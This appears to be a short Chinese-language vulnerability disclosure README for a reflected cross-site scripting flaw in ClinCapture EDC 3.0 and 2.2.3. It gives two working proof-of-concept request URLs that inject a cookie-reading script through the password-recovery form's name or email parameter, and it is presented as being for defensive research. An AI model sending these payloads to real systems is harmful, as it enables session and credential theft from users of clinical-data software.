本仓库仅用于教育和防御性安全研究
ClinCapture EDC 3.0 和 2.2.3 中存在反射型跨站脚本(XSS)漏洞,允许未经身份验证的远程攻击者在受害者浏览器的上下文中执行 JavaScript 代码。

要演示该漏洞,您需要进入密码找回选项卡,并在 name 或 email 参数中指定有效负载,或者发送一个请求
<url>/edc/RequestPassword?action=submit&name=text%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&[email protected]&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

<url>/edc/RequestPassword?action=submit&name=text&[email protected]%22%3E%3Cimg%20src%3dx%20onerror%3dalert(document.cookie)%3E&passwdChallengeQuestion=favorite_animal&passwdChallengeAnswer=&Submit=Submit

未经身份验证的用户可以在受害者浏览器的上下文中执行 JavaScript 代码,旨在代表受害者执行操作或窃取机密信息,例如安全问题的答案